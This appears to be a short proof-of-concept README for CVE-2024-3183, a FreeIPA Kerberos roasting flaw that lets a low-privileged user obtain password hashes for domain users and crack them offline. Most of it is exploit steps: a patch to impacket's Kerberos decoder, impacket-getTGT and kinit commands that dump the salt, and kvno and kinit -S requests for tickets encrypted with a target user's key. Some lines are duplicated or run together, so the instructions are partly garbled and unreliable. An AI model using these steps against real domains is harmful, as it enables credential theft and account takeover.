
POC for CVE-2024-3183 (FreeIPA Rosting)
POC for CVE-2024-3183 (FreeIPA Rosting)
Impact: A low-privileged user can obtain a hash of the passwords of all domain users and perform offline brute force (kerberoasting).
Patch impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag to impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag to impacket/krb5/kerberosv5.py.-service option and -debug option for get salt in one command.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Passwords.
kinit -S target userand you get TGT who encripted by target user key.